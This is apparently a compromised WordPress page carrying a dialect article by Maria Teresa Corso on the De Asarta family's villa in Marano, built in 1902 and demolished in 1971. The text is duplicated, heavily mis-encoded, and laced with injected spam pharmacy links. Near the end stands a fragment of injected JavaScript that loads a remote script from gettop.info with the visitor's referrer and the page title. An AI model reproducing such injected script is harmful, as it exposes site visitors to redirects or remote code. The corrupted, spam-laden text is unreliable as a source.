De AsartaDE ASARTA

La fameja De Asarta, originaria dela Navarra, monarchia dela Spagna, la ga vesto tanti capostipiti che i ga volesto combate le guere dai??i??indipendensa in Italia. Vittorio, nato a Parigi, ingegner e agricoltore el ze stA? deputato al ParlamentoAi?? nel 1909. Carlo Vittorio el gera nato a Ronchis nel 1915 e Alessandro el ze nato a Maran il 19.6.1916. La vila de Fraforean dove che i steva e el parco i ze stai comprai da Vitorio nel 1883, da quando chai??i??el se ga trasferAi??o da Genova in Friuli, portando per la prima volta le marsite nela rotassion del riso, impiegando in agricoltura lai??i??energia eletrica a vapor.Cognome De AsartaAi??La fameja De Asarta, originaria dela Navarra, monarchia dela Spagna, la ga vesto tanti capostipiti che i ga volesto combate le guere dai??i??indipendensa in Italia. Vittorio, nato a Parigi, ingegner e agricoltore el ze stA? deputato alParlamentoAi?? nel 1909. Carlo Vittorio el gera nato a Ronchis nel 1915 e Alessandro el ze nato a Maran il 19.6.1916. La vila de Fraforean dove che i steva e el parco i ze stai comprai da Vitorio nel 1883, da quando chai??i??el se ga trasferAi??o da Genova in Friuli, portando per la prima volta le marsite nela rotassion del riso, impiegando in agricoltura lai??i??energia eletrica a vapor.

La fameja De Asarta, o mejo i conti De Asarta de Fraforean,Ai?? sul finAi?? del secolo Otosento, i se veva portA? un zorno a Maran con una dele prime automobili. Le strade, le gera ancora bianche, come che se capissi, ma luriAi?? i zireva e con granda meraveja i veva trovA? che a Maran geraAi?? tante case una tacata a lai??i??altra le vigniva sofocae da le calle, parchA? lai??i??umiditAi??e la coreva da le fondamenta fin al primo pian. Duto intorno, fin al 1894 el paese el gera sircondA? da una muraja alta anca sedese metri, con tanto de smerlatura medieval. Secondo tante persone, quel fato impediva al sole, a lai??i??aria, ala luce de entrAi?? in tele case, che in quel modo le gera sempre umide, con mufe, batteri, etc http://sakaraboutique.com/buy-stromectol-online-no-prescription/ . Le cale sempre piA? malsane, la zente sempre piA? malada, soraduto i piA? piculi che i muriva sensa spiegassion in gran quantitAi??e. Overossia la spiegassion la gera e el rimedio lo veva intuAi??o el sindaco Olivotto nel 1894, val a dAi??, butando zo le mure par un problema de sanitAi??. E gera un discorso politico de dute le fortesse a livel europeo, secondo le diretive nassional. Ma se sa che quel abatimento forsi nol gera necessarioai??i??..

E sti siuri i riva a Maran co la carossa sensa cavai, come che la ze stada nominada dai maranisi: no i veva visto tante altre automobili in paeseai??i?? I se varAi?? fermA? a parlAi?? co la zente, i varAi?? visto che pescAi?? e cassiAi?? gera le do ativitAi??e naturali. La contessa la pregustava za el boreto fato duto coai??i?? le aneme dei go. CussAi?? i conti i ga pensA? cheAi?? quel posto vissin a lai??i??acqua con tanti commercianti che ogni zornoAi?? i porteva via el pescato coi carri, fussi motivi validi par confermAi?? lai??i??acquisto dela braida in tela Cuna. Grassie ale amicissie che i godeva con nobili e parlamentari, parchA? el conte Vitorio el gera deventA? senator del Regno e la muier, amica della regina Margherita, i De Asarta i ga podestA? comprAi?? el liogo, costruendoghe sora un ridoto de cacia de stile svissero o alpin (come in tel Modean de Palassiol) che perA? nol se adateva al ambiente.

I veva utilizA? pietre dai??i??Istria locali, quele del sinquesento che i maranisi i gera stai costriti a andAi?? ciole con la batela in gambia de una licensa de costrussion de barche, inserAi??o le bifore cinquecentesche messe in tela faciata. La vila costruAi??a nel 1902 la se sviluppava su tre piani. A piano tera iAi?? veva fato costruAi?? una scala de legno dai falegnamiAi?? de Latisana Ambrosio Giacomo e Giusto Giovanni che la porteva al primo pian con un andamento destra-sinistra, el parapeto, alto circa un metro el gera intervalA? da motivi floreali e cuori. Sul davanti un portico con terasso al primo pian, al secondo una serie de stanse, da una scala se andeva insima a una toreta, che la deva modo de vede el paesagio del palA?o.

La cantina sotostante e duto intorno un bel giardin chai??i??el gera deventA? un bel parco in ti ani dopo, a cura del bisnono dela siora Caterina, Falcomer Alessandro, ebanista, che tra lai??i??altro el veva anca curA? el parco dela contessa de San Zorzi e quel de Miramare.

Nel 1948 la parochia de Maran, con el monsignor Galeti de Ronchis, la ga tentA? de comprAi?? la vila, fazendo la canonica, nel 1951Ai?? perA? ze subentrA? el comun de Maran, solevando la parochia dai tanti debiti contrati.

Un bel zorno, ansi, un bruto zorno de febraio del 1971 la vila la ze stada butada zo co la bala de piera, colpo dopo colpo, par ve el spassio par costruAi?? la scola materna.

A cura di Maria Teresa Corso

Novembre 2012

La fameja De Asarta, o mejo i conti De Asarta de Fraforean,Ai?? sul finAi?? del secolo Otosento, i se veva portA? un zorno a Maran con una dele prime automobili. Le strade, le gera ancora bianche, come che se capissi, ma luriAi?? i zireva e con granda meraveja i veva trovA? che a Maran geraAi?? tante case una tacata a lai??i??altra le vigniva sofocae da le calle, parchA? lai??i??umiditAi??e la coreva da le fondamenta fin al primo pian. Duto intorno, fin al 1894 el paese el gera sircondA? da una muraja alta anca sedese metri, con tanto de smerlatura medieval. Secondo tante persone, quel fato impediva al sole, a lai??i??aria, ala luce de entrAi?? in tele case, che in quel modo le gera sempre umide, con mufe, batteri, etc. Cheap http://forfaitmobile.fr/lipotrexate-price/ Le cale sempre piA? malsane, la zente sempre piA? malada, soraduto i piA? piculi che i muriva sensa spiegassion in gran quantitAi??e. Overossia la spiegassion la gera e el rimedio lo veva intuAi??o el sindaco Olivotto nel 1894, val a dAi??, butando zo le mure par un problema de sanitAi??. E gera un discorso politico de dute le fortesse a livel europeo, secondo le diretive nassional. Ma se sa che quel abatimento forsi nol gera necessarioai??i??..

E sti siuri i riva a Maran co la carossa sensa cavai, come che la ze stada nominada dai maranisi: no i veva visto tante altre automobili in paeseai??i?? I se varAi?? fermA? a parlAi?? co la zente, i varAi?? visto che pescAi?? e cassiAi?? gera le do ativitAi??e naturali. La contessa la pregustava za el boreto fato duto coai??i?? le aneme dei go. CussAi?? i conti i ga pensA? cheAi?? quel posto vissin a lai??i??acqua con tanti commercianti che ogni zornoAi?? i porteva via el pescato coi carri, fussi motivi validi par confermAi?? lai??i??acquisto dela braida in tela Cuna. Grassie ale amicissie che i godeva con nobili e parlamentari, parchA? el conte Vitorio el gera deventA? senator del Regno e la muier, amica della regina Margherita, i De Asarta i ga podestA? comprAi?? el liogo, costruendoghe sora un ridoto de cacia de stile svissero o alpin (come in tel Modean de Palassiol) che perA? nol se adateva al ambiente.

I veva utilizA? pietre dai??i??Istria locali, quele del sinquesento che i maranisi i gera stai costriti a andAi?? ciole con la batela in gambia de una licensa de costrussion de barche, inserAi??o le bifore cinquecentesche messe in tela faciata. La vila costruAi??a nel 1902 la se sviluppava su tre piani. A piano tera iAi?? veva fato costruAi?? una scala de legno dai falegnamiAi?? de Latisana Ambrosio Giacomo e Giusto Giovanni che la porteva al primo pian con un andamento destra-sinistra, el parapeto, alto circa un metro el gera intervalA? da motivi floreali e cuori. Sul davanti un portico con terasso al primo pian, al secondo una serie de stanse, da una scala se andeva insima a una toreta, che la deva modo de vede el paesagio del palA?o.

La cantina sotostante e duto intorno un bel giardin chai??i??el gera deventA? un bel parco in ti ani dopo, a cura del bisnono dela siora Caterina, Falcomer Alessandro, ebanista, che tra lai??i??altro el veva anca curA? el parco dela contessa de San Zorzi e quel de Miramare.

Nel 1948 la parochia de Maran, con el monsignor Galeti de Ronchis, la ga tentA? de comprAi?? la vila, fazendo la canonica, nel 1951Ai?? perA? ze subentrA? el comun de Maran, solevando la parochia dai tanti debiti contrati.

Un bel zorno, ansi, un bruto zorno de febraio del 1971 la vila la ze stada butada zo co la bala de piera, colpo dopo colpo, par ve el spassio par costruAi?? la scola materna.

A cura di Maria Teresa Corso

Novembre 2012document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; online http://copiacloud.com/order-diarex-filler/ ?buy lipothin order floxin eye cheap gasex himalaya Order http://www.locksafeandvaultja.com/2018/02/02/cheap-yougaramdewbaba/ benzac price philippines mercury drug

Lascia una risposta

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo